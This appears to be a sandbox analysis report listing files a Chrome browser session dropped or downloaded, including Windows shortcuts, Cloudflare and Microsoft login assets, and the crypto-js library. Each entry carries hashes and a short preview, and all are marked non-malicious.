                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Dec 3 21:32:48 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                          Category:dropped
                                          Size (bytes):2675
                                          Entropy (8bit):4.008319952130847
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:DB08AAA0C11C5CFB20D4F7998146EFBB
                                          SHA1:E5F99F9E693A830B002B7A248EA36D7B9BE30EE6
                                          SHA-256:20046E00157AEE518086BFF1D6A99A524314A0D54C5F228F1FD5A2EAEEF28001
                                          SHA-512:91BC05F2F09BFD718F50C95AF7EA8AC699C9C120C3FA356F341FCE98190AC1A3E1321D7E948B29F9A8D2A24B1E2F81FE9E6C9D71D7148CE438742E3BCC04B00C
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:L..................F.@.. ...$+.,....%..H.E..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............N.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                          Category:dropped
                                          Size (bytes):2689
                                          Entropy (8bit):4.015329897958944
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:1A885DAC1B06F6D25DA44F3CB0FD3107
                                          SHA1:3B1D387A378C75F167879D02F4FABA396B166E47
                                          SHA-256:89A919296943F0912095855E0F3E86C413B7D2044284C28CBA02F1030B9833C9
                                          SHA-512:A73E37DE497C29FBB578DECD6B19BCD698349B3087C1D724324827656EE79BBC9373C54C65449402DFDF7A2C1D9C156DDDC78B85AD8C92C8FFFC0AEB2A8CFFCA
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............N.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Dec 3 21:32:48 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                          Category:dropped
                                          Size (bytes):2677
                                          Entropy (8bit):4.0073606487777536
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:75253C00ADB1653A74108F21698F4F0B
                                          SHA1:30B3B88A28803B9672EEEB0CDC4FB1574FE7709E
                                          SHA-256:C62B5598BB038F15CE28F7C6B74286A302EB0B8AAE88E21D574A001174120076
                                          SHA-512:FF5D44D1551459A01B39F0F41068D6174C8DEE3507C10C4AF75EDF6F6211F1CFE3579C856BA30FB7951C42026747BFAD2391F7B60A5BAD8FE8C29B778B9B7A42
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:L..................F.@.. ...$+.,.....Q.H.E..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............N.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Dec 3 21:32:48 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                          Category:dropped
                                          Size (bytes):2677
                                          Entropy (8bit):3.993233280203614
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:4FF22F2FD68D26771C9316FAC48C7F73
                                          SHA1:D5E1B7F19BE949AADAFBF9C893E713765B051C85
                                          SHA-256:95DC7E67BB7733565AAF4CD76F947A26AE28CF8A679F50F05CD9F8F5AFD4E16D
                                          SHA-512:FD901E43311D9307964379E974EDD0B601AB65B6EE44DDD01FF8DA342496DE2EC4832C272789FE74077DD5F18D04E2CC1360E7A3E4A11526C0739EA91FDE35F0
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:L..................F.@.. ...$+.,....._ H.E..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............N.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Dec 3 21:32:48 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                          Category:dropped
                                          Size (bytes):2679
                                          Entropy (8bit):4.0022587641796195
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:0C7A33992D15A674B47692B50A4A2B4F
                                          SHA1:BB5858E939485553CE29CC586907839C57519419
                                          SHA-256:92F234FB1E45C618D904F6213AA50A5925747901B2C945464B7AAF47325648D1
                                          SHA-512:FB757DF8CB1261A4688C13BC19E56AACAFF05BB24CE63A7929D77AD7E527B392A9679C93E9F95099FAA3880DB7F5F9EECD6FD5FABE5E1E670769977B46E51B9E
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:L..................F.@.. ...$+.,....$x.H.E..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............N.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                          Category:downloaded
                                          Size (bytes):61
                                          Entropy (8bit):3.990210155325004
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                          SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                          SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                          SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1
                                          Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:Unicode text, UTF-8 text, with very long lines (65533), with no line terminators
                                          Category:dropped
                                          Size (bytes):738853
                                          Entropy (8bit):5.575570724358485
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:03B0228A74A6098935DDCA4E5306005D
                                          SHA1:FD5F160375F6B9BD0FC7BC183E4124EBF6E115C2
                                          SHA-256:824F446860CD3ACB1DDF0074BCC8FEE8BF2E7865ED8FEFB4F624D51D92EEAED7
                                          SHA-512:89147F28429AC8474AA23190D1269FFDDD8D8757FD1A038055183D4F02E6927F43DC33E815991A441D5CA7CE98D1E62F46021B66C488007D26BCF9BEF0722281
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:var hsw=function IcgSGO(){"use strict";function A(A,Q,B){return Q<=A&&A<=B}function Q(A){if(void 0===A)return{};if(A===Object(A))return A;throw TypeError("Could not convert argument to dictionary")}var B=function(A){return A>=0&&A<=127},E=-1;function I(A){this.tokens=[].slice.call(A),this.tokens.reverse()}I.prototype={endOfStream:function(){return!this.tokens.length},read:function(){return this.tokens.length?this.tokens.pop():E},prepend:function(A){if(Array.isArray(A))for(var Q=A;Q.length;)this.tokens.push(Q.pop());else this.tokens.push(A)},push:function(A){if(Array.isArray(A))for(var Q=A;Q.length;)this.tokens.unshift(Q.shift());else this.tokens.unshift(A)}};var C=-1;function g(A,Q){if(A)throw TypeError("Decoder error");return Q||65533}function i(A){return A=String(A).trim().toLowerCase(),Object.prototype.hasOwnProperty.call(D,A)?D[A]:null}var D={};[{encodings:[{labels:["unicode-1-1-utf-8","utf-8","utf8"],name:"UTF-8"}],heading:"The Encoding"}].forEach((function(A){A.encodings.forEach(
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:downloaded
                                          Size (bytes):28
                                          Entropy (8bit):4.307354922057605
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:9F9FA94F28FE0DE82BC8FD039A7BDB24
                                          SHA1:6FE91F82974BD5B101782941064BCB2AFDEB17D8
                                          SHA-256:9A37FDC0DBA8B23EB7D3AA9473D59A45B3547CF060D68B4D52253EE0DA1AF92E
                                          SHA-512:34946EF12CE635F3445ED7B945CF2C272EF7DD9482DA6B1A49C9D09A6C9E111B19B130A3EEBE5AC0CCD394C523B54DD7EB9BF052168979A9E37E7DB174433F64
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwnwhV5282zNgxIFDdFbUVISBQ1Xevf9?alt=proto
                                          Preview:ChIKBw3RW1FSGgAKBw1Xevf9GgA=
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:HTML document, ASCII text, with very long lines (3450), with CRLF line terminators
                                          Category:downloaded
                                          Size (bytes):3452
                                          Entropy (8bit):5.117912766689607
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:CB06E9A552B197D5C0EA600B431A3407
                                          SHA1:04E167433F2F1038C78F387F8A166BB6542C2008
                                          SHA-256:1F4EDBD2416E15BD82E61BA1A8E5558D44C4E914536B1B07712181BF57934021
                                          SHA-512:1B4A3919E442EE4D2F30AE29B1C70DF7274E5428BCB6B3EDD84DCB92D60A0D6BDD9FA6D9DDE8EAB341FF4C12DE00A50858BF1FC5B6135B71E9E177F5A9ED34B9
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://login.live.com/Me.htm?v=3
                                          Preview:<script type="text/javascript">!function(t,e){for(var s in e)t[s]=e[s]}(this,function(t){function e(n){if(s[n])return s[n].exports;var i=s[n]={exports:{},id:n,loaded:!1};return t[n].call(i.exports,i,i.exports,e),i.loaded=!0,i.exports}var s={};return e.m=t,e.c=s,e.p="",e(0)}([function(t,e){function s(t){for(var e=f[S],s=0,n=e.length;s<n;++s)if(e[s]===t)return!0;return!1}function n(t){if(!t)return null;for(var e=t+"=",s=document.cookie.split(";"),n=0,i=s.length;n<i;n++){var a=s[n].replace(/^\s*(\w+)\s*=\s*/,"$1=").replace(/(\s+$)/,"");if(0===a.indexOf(e))return a.substring(e.length)}return null}function i(t,e,s){if(t)for(var n=t.split(":"),i=null,a=0,r=n.length;a<r;++a){var c=null,S=n[a].split("$");if(0===a&&(i=parseInt(S.shift()),!i))return;var l=S.length;if(l>=1){var p=o(i,S[0]);if(!p||s[p])continue;c={signInName:p,idp:"msa",isSignedIn:!0}}if(l>=3&&(c.firstName=o(i,S[1]),c.lastName=o(i,S[2])),l>=4){var f=S[3],d=f.split("|");c.otherHashedAliases=d}if(l>=5){var h=parseInt(S[4],16);h&&(c.
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with very long lines (47694)
                                          Category:dropped
                                          Size (bytes):47695
                                          Entropy (8bit):5.401531363850578
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:1685878B80EECB073E51C13F17A5E530
                                          SHA1:0FFFA666F98F2D8C1156D46D7F9AB90C5B089AF3
                                          SHA-256:C61E2E1347B9ACA3D8F0C9725490470651A1F6C02841FF71F90305EA391CA6D2
                                          SHA-512:2B32A82A8E7E0A1F6203A04C3E7DDAE6AC3A4438B2309DC04EA112D862839902DD47D2E4A569BCB6F91E359B1F8197F3A179A206A458881A66E89860F96D526E
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:"use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Ht(u,o,c,g,h,"next",l)}function h(l){Ht(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1592
                                          Category:dropped
                                          Size (bytes):621
                                          Entropy (8bit):7.673946009263606
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:4761405717E938D7E7400BB15715DB1E
                                          SHA1:76FED7C229D353A27DB3257F5927C1EAF0AB8DE9
                                          SHA-256:F7ED91A1DAB5BB2802A7A3B3890DF4777588CCBE04903260FBA83E6E64C90DDF
                                          SHA-512:E8DAC6F81EB4EBA2722E9F34DAF9B99548E5C40CCA93791FBEDA3DEBD8D6E401975FC1A75986C0E7262AFA1B9D1475E1008A89B92C8A7BEC84D8A917F221B4A2
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:..........}UMo"1..+.....G; .8l...M..$.U.AW......UaX..`'.=......|..z3...Ms>..Y...QB..W..y..6.......?..........L.W=m....=..w.)...nw...a.z......#.y.j...m...P...#...6....6.u.u...OF.V..07b..\...s.f..U..N..B...>.d.-z..x.2..Lr.Rr)....JF.z.;Lh.....q.2.A....[.&".S..:......]........#k.U#57V..k5.tdM.j.9.FMQ2..H:.~op..H.......hQ.#...r[.T.$.@........j.xc.x0..I.B:#{iP1.e'..S4.:...mN.4)<W.A.).g.+..PZ&.$.#.6v.+.!...x*...}.._...d...#.Cb..(..^k..h!..7.dx.WHB......(.6g.7.Wwt.I<.......o.;.....Oi$}f.6.....:P..!<5.(.p.e.%et.)w8LA.l9r..n.....?.F.DrK...H....0F...{.,.......{E.."....*...x.@..?u......../....8...
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with very long lines (60819), with no line terminators
                                          Category:downloaded
                                          Size (bytes):60819
                                          Entropy (8bit):5.4839527999983755
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:D9C6DE0DF2BF028D93924AFF92487904
                                          SHA1:6596050516DD12AF52D9B0E7B18ED837F1D81300
                                          SHA-256:769A555DE553BABC35A3338F344DD7AA16260C93CEA2C7DB290707C90484E7CC
                                          SHA-512:6BE4940EEC0DCD70EFCF85EB21C5C7B827F4F3DFE2240A0DE259AB5C9835F179DDB8A2BA6250C73516A5BF8C9DD4DE3438A23CD2D162745FABA9314A18FA1615
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.2.0/crypto-js.min.js
                                          Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var W,O,I,U,K,X,L,l,j,T,t,N,q,e,Z,V,G,J,Q,Y,$,t1,e1,r1,i1,o1,n1,s,s1,c1,a1,h1,l1,o,f1,r,d1,u1,n,c,a,h,f,d,i=function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},o=t.lib={},n=o.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function()
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:GIF image data, version 89a, 352 x 3
                                          Category:dropped
                                          Size (bytes):3620
                                          Entropy (8bit):6.867828878374734
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:B540A8E518037192E32C4FE58BF2DBAB
                                          SHA1:3047C1DB97B86F6981E0AD2F96AF40CDF43511AF
                                          SHA-256:8737D721808655F37B333F08A90185699E7E8B9BDAAA15CDB63C8448B426F95D
                                          SHA-512:E3612D9E6809EC192F6E2D035290B730871C269A267115E4A5515CADB7E6E14E3DD4290A35ABAA8D14CF1FA3924DC76E11926AC341E0F6F372E9FC5434B546E5
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:GIF89a`.........iii!.......!.&Edited with ezgif.com online GIF maker.!..NETSCAPE2.0.....,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....`.....9..i....Q4......H..j.=.k9-5_..........j7..({.........!.......,....`.....9.......trV.......H....`.[.q6......>.. .CZ.&!.....M...!.......,....`.....8..........:......H..jJ..U..6_....../.el...q.)...*..!.......,....`.....9.....i..l.go.....H..*".U...f......._......5......n..!.......,....`.....:..i......./.....H...5%.kE/5.........In.a..@&3.....J...!.......,....`.....9.......kr.j.....H..*.-.{Im5c..............@&.........!.......,....`.....9.........j..q....H...].&..\.5.........8..S..........!.......,....`.....9.......3q.g..5....H...:u..............Al..x.q.........!.......,....`.....9......\.F....z....H...zX...ov.........h3N.x4......j..!.......,....`.....9........Q.:......H....y..^...1.........n.!.F......E...!.......,....`.....8.........i,......H....*_.21.I.........%...
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 449972
                                          Category:downloaded
                                          Size (bytes):122341
                                          Entropy (8bit):7.997734268074267
                                          Encrypted:true
                                          SSDEEP:
                                          MD5:0015292EAF58B4680B4A303F7C153A35
                                          SHA1:39C6356FC5DD37C3695D7ABDFA921EAC92BD830E
                                          SHA-256:C7733C6D69B9FE91B93B3C1FD3838898810C0F23017A1BF3011ECC0DB0722620
                                          SHA-512:DAE8CED5C0FE1D5485C59F9ACCB20375142B87060CD93040D314E38DDE1F82BBA2E66C0721096DF3F251EE1D5D77919530A9F109F38E022CF74A1802E88C6DC9
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://aadcdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_h6TdaK6cfsrg175w47aRCA2.js
                                          Preview:...........{w.8.8.....fn..(...J.....v.g.wS..Y..ud.+.y....?.$%.SU.{.=..yT,.|. .. ......si...S.]...K.......%|.G.bx}..|.=.(.....K..g%.;.c...F%/p.h.Fv......<./M.pVJ.Xi...2'.K..'Ph...T..".tiG.k...R.....M..J;...~?$. L<......|..bVZ...J....P:..(..IR...'h$^@z...dG....4.....Z.!..5.fx.1.C.<.*..@._...b....4......t".....C).K..B.>...LK..YL.`zV.t.]8I57.EO.E./.....Y1...^......id..r..L.=.... ..y..._K.l.....%.'.|.|.[...YU.A..g....q.\....Zk.fTx.C..c....<,.U'.}p...c....s?..hx..g...q\.....zP:.g....U...).?..K..X..>..........d.8.2.,..RP..+..O6 _....nkwz...;=.j.c.....U.....0..xVx....1..*.~.&.sV}...s.(.3 ...s_.u...k.zw..Nu.......Tt.a......n).|W...@.ev..Y..S....]..s..V.j..M.r.\Y..Z.n[.z...S4...oR.n..J.E...w....b|H.-L.....c.".\.V....B..D...=..V..vjY..D.B......rb...~U2b\.....:.0.M~k;....Z_..!......5......m....k.N..&.+...Ri...T\.8`{.3.B...DL}4].:.u........`?....W`Z".S.S..<= ....Z...n."..*}..K.{8)..._..A%..L...I)UX...)y..P.V.....G.....z{K?.,............@Z..2.(..%'<B..
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                          Category:downloaded
                                          Size (bytes):17174
                                          Entropy (8bit):2.9129715116732746
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:12E3DAC858061D088023B2BD48E2FA96
                                          SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                          SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                          SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://aadcdn.msauth.net/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico
                                          Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 57510
                                          Category:dropped
                                          Size (bytes):16345
                                          Entropy (8bit):7.98960525258912
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:187B9EBA41FDF66B2C8F7EB645D2BC17
                                          SHA1:B1C034F7F5F754F271D094FB417B9A820C1F712C
                                          SHA-256:CA0FBF8421A0CF4CCDA7310B2AE74CBD92214901EC2D0F273EA3B07F12CF96EA
                                          SHA-512:0D7FB682D24E97C9E3FC04AA87CCB8EC508CA0CF197DA0617EFFD981BC8B5E3600824FDD08F1F31F59D276B5BF53229D00805D984E01D512FD968610C5FE9609
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:...........}Ms#.......\.@..'F.........3RH2....~......Q.x7...}..'.}..?e#...QU]....Vo..................?........w!......=.G...P.../......8z....q._5....g..}g..31......l*...],.b..;..`...Y....3..5.uGAi..NP.6<.w.(..`...y..d.N.x..^u.....^...?..N........Fq.....z..wgN./..Ep/f..c/.D4~X.W~).s/.E8...T...8,:..Q.p>.....7.....4....Z,&c.)n.[.pcQp...4...&...i.............CkL=.....g..m&vG..p... ....:N`y...ea.,....[......^.../D#(y.....l4.n..,.=_.p2P.....A,..RP..E.T......8 .v....Iw.X..?.r......nk....?Wj..a.|..........JAs.j......?.)..t.z.-..m.]..3y...3@...'.)...Aa..1.kQ.....l+.....-q..n.p..{^...$..{/...=a..A...4.VH}..SBwju......S..hN.P..-..O,..S7.J,.....p.iLU.6W.....eO.7 ..C...{.E.Z...1...5s.!uY...@^. ,D".N.E......5.NE..\...VQa.A7..X.B..{.q..Ra..S....x(x7.Cp.#.#..:.......D..`,!IGr.. ...z.?.._0O.......;..0.z.h....5.../...q..5.|..B.OY..k...].Sw.>.".@..!.9.V|...=.dv.3!sr.....#...X8s.w.|7..O/....!.."...3.."D..)...[........!^....3(..{...F2'..q.....x........
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (39933)
                                          Category:downloaded
                                          Size (bytes):359430
                                          Entropy (8bit):5.52279949291739
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:F3998D2AA445ADEC862BCD94D81505AE
                                          SHA1:AFA2351D61B1E3265967B978D153D2E490B24E7A
